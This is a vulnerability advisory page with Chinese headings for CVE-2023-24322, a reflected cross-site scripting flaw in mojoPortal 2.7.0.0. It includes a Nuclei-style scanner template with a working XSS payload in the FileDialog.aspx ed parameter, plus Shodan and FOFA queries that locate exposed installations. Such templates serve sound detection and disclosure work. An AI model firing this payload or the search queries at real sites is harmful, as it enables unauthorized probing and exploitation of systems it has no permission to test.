CVE-2023-24322: mojoPortal 2.7.0.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: mojoPortal | POC: 已公开

漏洞描述

mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.

PoC代码[已公开]

id: CVE-2023-24322

info:
  name: mojoPortal 2.7.0.0 - Cross-Site Scripting
  author: pikpikcu
  severity: medium
  description: |
    mojoPortal 2.7.0.0 contains a cross-site scripting vulnerability in the FileDialog.aspx component, which can allow an attacker to execute arbitrary web scripts or HTML via a crafted payload injected into the ed and tbi parameters.
  remediation: |
    Upgrade to a patched version of mojoPortal or apply the necessary security patches to mitigate the XSS vulnerability.
  reference:
    - https://github.com/blakduk/Advisories/blob/main/Mojoportal/README.md
    - https://github.com/i7MEDIA/mojoportal/
    - https://www.mojoportal.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-24322
    - https://github.com/blakduk/Advisories
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-24322
    cwe-id: CWE-79
    epss-score: 0.19147
    epss-percentile: 0.95139
    cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: mojoportal
    product: mojoportal
    shodan-query:
      - html:"mojoPortal"
      - http.html:"mojoportal"
    fofa-query: body="mojoportal"
  tags: cve,cve2023,cves,mojoportal,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/Dialog/FileDialog.aspx?ed=foooooooooooooo%27);});});javascript:alert('document.domain');//g"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "javascript:alert('document.domain')"
          - "File Browser"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a4447c9a1bb64f8931e8380eaa71ecafdaf113874163adaf2dc705847b32d11e02200e2bee4f6db670a03f8780897a3e30edc489461b053ef02957274e1ba7f20c3e:922c64590222798bb761d5b6d8e72950

相关漏洞推荐